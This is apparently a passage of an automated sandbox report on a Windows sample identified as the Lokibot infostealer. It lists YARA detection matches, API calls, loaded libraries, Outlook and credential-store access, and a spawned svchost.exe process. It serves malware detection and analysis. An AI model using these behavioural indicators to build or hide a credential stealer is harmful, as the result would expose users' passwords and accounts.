                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AF66E10_2_00AF66E1
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B3E6160_2_00B3E616
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B1878F0_2_00B1878F
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B488890_2_00B48889
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AF88080_2_00AF8808
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B608570_2_00B60857
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B168440_2_00B16844
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0CB210_2_00B0CB21
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B16DB60_2_00B16DB6
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AF6F9E0_2_00AF6F9E
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AF30300_2_00AF3030
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B031870_2_00B03187
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0F1D90_2_00B0F1D9
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE12870_2_00AE1287
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B014840_2_00B01484
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AF55200_2_00AF5520
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B076960_2_00B07696
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AF57600_2_00AF5760
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B019780_2_00B01978
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B19AB50_2_00B19AB5
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0BDA60_2_00B0BDA6
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B01D900_2_00B01D90
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B67DDB0_2_00B67DDB
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AF3FE00_2_00AF3FE0
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AEDF000_2_00AEDF00
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00CE36100_2_00CE3610
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040549C1_2_0040549C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029D41_2_004029D4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D927201_2_00D92720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00405B6F appears 42 times
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: String function: 00B08900 appears 42 times
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: String function: 00B00AE3 appears 70 times
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: String function: 00AE7DE1 appears 36 times
                  Source: vsf098633534.exe, 00000000.00000003.1673527760.00000000038ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vsf098633534.exe
                  Source: vsf098633534.exe, 00000000.00000003.1675195892.0000000003743000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vsf098633534.exe
                  Source: vsf098633534.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@1/1
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4A06A GetLastError,FormatMessageW,0_2_00B4A06A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B381CB AdjustTokenPrivileges,CloseHandle,0_2_00B381CB
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B387E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B4B3FB
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B5EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B5EE0D
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B583BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00B583BB
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AE4E89
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00D93360
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00D93360
                  Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                  Source: C:\Users\user\Desktop\vsf098633534.exeFile created: C:\Users\user\AppData\Local\Temp\aut1863.tmpJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeCommand line argument: X0_2_00AE47D0
                  Source: C:\Users\user\Desktop\vsf098633534.exeCommand line argument: X0_2_00AE47D0
                  Source: vsf098633534.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\vsf098633534.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: svchost.exe, 00000001.00000003.1676081106.0000000005245000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: vsf098633534.exeVirustotal: Detection: 30%
                  Source: vsf098633534.exeReversingLabs: Detection: 28%
                  Source: unknownProcess created: C:\Users\user\Desktop\vsf098633534.exe "C:\Users\user\Desktop\vsf098633534.exe"
                  Source: C:\Users\user\Desktop\vsf098633534.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vsf098633534.exe"
                  Source: C:\Users\user\Desktop\vsf098633534.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vsf098633534.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: vsf098633534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: vsf098633534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: vsf098633534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: vsf098633534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: vsf098633534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: vsf098633534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: vsf098633534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: vsf098633534.exe, 00000000.00000003.1674953107.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, vsf098633534.exe, 00000000.00000003.1674472374.0000000003620000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2918187472.0000000000D91000.00000020.00000001.01000000.00000005.sdmp
                  Source: vsf098633534.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: vsf098633534.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: vsf098633534.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: vsf098633534.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: vsf098633534.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE4B37 LoadLibraryA,GetProcAddress,0_2_00AE4B37
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4848F push FFFFFF8Bh; iretd 0_2_00B48491
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0E70F push edi; ret 0_2_00B0E711
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0E828 push esi; ret 0_2_00B0E82A
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B08945 push ecx; ret 0_2_00B08958
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0EAEC push edi; ret 0_2_00B0EAEE
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0EA03 push esi; ret 0_2_00B0EA05
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00D93360
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AE48D7
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B65376
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B03187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B03187
                  Source: C:\Users\user\Desktop\vsf098633534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\vsf098633534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
